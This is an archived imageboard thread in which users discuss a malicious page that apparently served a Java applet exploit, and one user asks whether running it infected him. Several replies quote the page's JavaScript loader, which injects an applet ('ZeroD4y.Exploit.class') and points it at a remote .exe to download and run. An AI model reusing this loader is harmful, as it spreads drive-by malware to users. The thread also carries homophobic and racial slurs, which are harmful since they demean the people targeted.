[ 3 / biz / cgl / ck / diy / fa / g / ic / jp / lit / sci / tg / vr ] [ index / top / reports / report a bug ] [ 4plebs / archived.moe / rbt ]

2017/01/28: An issue regarding the front page of /jp/ has been fixed. Also, thanks to all who contacted us about sponsorship.

/g/ - Technology

View post   

[ Toggle deleted replies ]
File: 72 KB, 349x320, 1339386043562.jpg [View same] [iqdb] [saucenao] [google] [report]
27279939 No.27279939 [DELETED]  [Reply] [Original] [archived.moe] [rbt]

so those fags at /v/ posted a java virus at pagemakeDOTorg (DON'T GO ON IT) and it's supposed to be bad. i ran it but i did a scan with combofix after. should i be alright?

>> No.27279953


>> No.27279960

First Lostboy and now this, they've actually found a way to weed out their own problems

>> No.27279984

people who fell for lostboy are pretty stupid but this wasn't too obvious. can anybody just spare a nigga a format and confirm if anything's gonna happen?

>> No.27280050


>> No.27280066

Sure, just go to google. Search for Common Sense Anti-Virus Suite 2012.exe.

>> No.27280081

come on

>> No.27280103

var xxx3 = window.navigator.userAgent.toLowerCase();
if (xxx3.indexOf("msie 6") > -1) {
document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://pagemake.org/dcgold.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'ZeroD4y.Exploit.class'><param name=archive value= 'applet.jar'></OBJECT>");
} else {
var gondady = document.createElement("body");
var gondad = document.createElement("applet");
gondad.width = "256";
gondad.height = "256";
gondad.archive = "applet.jar";
gondad.code = "ZeroD4y.Exploit.class";
gondad.setAttribute("xiaomaolv", "http://pagemake.org/dcgold.exe");
gondad.setAttribute("bn", "woyouyizhixiaomaol");
gondad.setAttribute("si", "conglaiyebuqi");
gondad.setAttribute("bs", "748");

>> No.27280106

What was Lostboy?

>> No.27280112


delete sBtEp6;

delete kikT2;

delete meSjBJF7;

delete ASQdP6;

delete XXCoPJ0;

delete uxNAFTd8;

delete Dkni4;

delete FVfejc3;

delete IqVSn5;

delete utCv1;

delete DxDLFS8;

delete dItNk7;

delete vlWWlBt3;

delete bAiMAGd8;

delete NcFjn7;

delete jBqxUaE8;

delete IdKXNGU1;

delete rEvzEVH1;

delete eEuq4;

delete biVddtE4;

delete NNDI5;

delete FfFodpV4;

delete rlAR8;

delete sRjYnQL3;

delete KIRD0;

delete mCXaH4;

delete wbCQBK2;

delete EXwldo6;

delete PAhnWW4;

delete OUBbzls1;

delete icEHu7;

delete pvlV3;

delete IYcB5;

delete VhrFry1;

delete CrtHBs2;

delete fOfdQ0;

delete zVpc2;

delete LLrEV8;

delete epraa1;

delete pDoPas0;


>> No.27280125

A fake game that didn't run but would put a few images in System32
Everyone on /v/ got paranoid as all hell

>> No.27280126


>> No.27280145

so should i format or would the scan have gotten it?

>> No.27280159

I assume you mean images like disc images not pictures, right?

>> No.27280166

as in nothing would actually deleted?

>> No.27280173

Here's the 1337 trojan hax0r file that it executes

>> No.27280180

so what's the deal? how malicious is this shit? how to deal?

>> No.27280199

if (xxx3.indexOf("msie 6") > -1) {
document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://pagemake.org/dcgold.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'ZeroD4y.Exploit.class'><param name=archive value= 'applet.jar'></OBJECT>");
} else {

><param name=xiaomaolv value= 'http://pagemake.org/dcgold.exe'>
><param name=CODE value= 'ZeroD4y.Exploit.class'>

>> No.27280201

They were actually pictures, yes

No, it didn't do anything

>> No.27280207

please respond

>> No.27280243

install a nonshit operating system, I suggest trisquel
It's using this zeroday by the way
>It appears that you do not have Java installed, or your version of Java is out of date. To play this game for free please click here to download the latest version of Java. Alternatively, click here to get the downloadable version of the game.

>> No.27280259

sorry i'm not a faggot. linux is for queers

>> No.27280273

I'd just like to inteeeerject for a moment. What you’re referring to as Linux, is in fact, GNU/Linux, or as I’ve recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.
Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called “Linux”, and many of its users are not aware that it is basically the GNU system, developed by the GNU Project. There really is a Linux, and these people are using it, but it is just a part of the system they use.
Linux is the kernel: the program in the system that allocates the machine’s resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called “Linux” distributions are really distributions of GNU/Linux.

>> No.27280299
File: 59 KB, 891x515, stats.png [View same] [iqdb] [saucenao] [google] [report]

All dos zombies
Thanks /v/

>> No.27280334
File: 2 KB, 106x125, 1346399711678s.jpg [View same] [iqdb] [saucenao] [google] [report]

100% safe

>> No.27280353


>> No.27280364

It's a runescape fag

>> No.27280402

So, what exactly does it do?

>> No.27280412

it's a panda! how can you mistrust a panda?
They're the friendly stuffed animals of nature

>> No.27280414

gondad.archive = "applet.jar";
gondad.code = "ZeroD4y.Exploit.class";
gondad.setAttribute("xiaomaolv", "http://pagemake.org/dcgold.exe");

99% sure it downloads an .exe via an auto-authenticating java applet and runs it.

>> No.27280427

Install the dolphin screensaver they said
Dolphins wouldn't hurt anybody they said

>> No.27280429

In terms a retard would understand?

>> No.27280439

that's terms a retard would understand

>> No.27280447

You're fucking stupid even I can understand that

>> No.27280450

What does it actually do to the computer once it runs?

>> No.27280461

If you run windows and have java, you're fucked basically.

>> No.27280475

What he said was pretty self explanatory?

>> No.27280520

It's not auto-authenticating, the maker is a skid faggot.
You have to manually allow java to run, pathetic.

>> No.27280537 [DELETED] 
File: 9 KB, 389x92, _1346400417733.png [View same] [iqdb] [saucenao] [google] [report]

On Windows, you shouldn't be browsing with anything but Firefox with NoScript. Will anything happen if I let it run on GNU/Linux?

>> No.27280548


What I mean, is what negative effect will this have on my computer?

Will it log my typing?
Does it delete files?

>> No.27280569

How about you just don't run it you fucking idiot

>> No.27280590

Did you allow the java?

>> No.27280591
File: 9 KB, 389x92, _1346400417733.png [View same] [iqdb] [saucenao] [google] [report]

You wouldn't need to worry about this shit if you'd just install NoScript. If you're too dumb to configure it, you should trade your WC for some iThings and consoles.

>> No.27280594

No one can tell unless they run it themselves. I would but not on this PC so too bad.

He already did.

>> No.27280614

Here is the thing.

Went to the site.
Noscript blocked 3 scripts
Allow first script
Unallow first script
Exit site.
And now I am running Avast scan and Malware scan.

I don't even know if I have it or not. I didn't get anything from Avast.

>> No.27280617

>Using a browser that requires noscript for basic functionality

>> No.27280639

>blocked 3 scripts
>unblock the first one

Fucking idiot, why even use NoScript if you're just going to allow them

>> No.27280651

It would have asked you to run a java applet
You're fine faggot, stop being gay

>> No.27280656
File: 129 KB, 400x400, nopes.jpg [View same] [iqdb] [saucenao] [google] [report]

>Allow first script
>Unallow first script

k this is becoming /g/support line, bye uninstall windows.

>> No.27280680

>having java installed in the first place
They deserve it!

>> No.27280723


>> No.27280728

It's a runescape fag

>> No.27280766

I am so scarred...
Hold me /v/...

>> No.27280770


>> No.27280771

>i ran it

>> No.27280774

Don't click this bros.

>> No.27280792

Install Linux.

>> No.27280803

Why are Windows users so paranoid about getting a virus? They pirated a rootkit in the first place.

Name (leave empty)
Comment (leave empty)
Password [?]Password used for file deletion.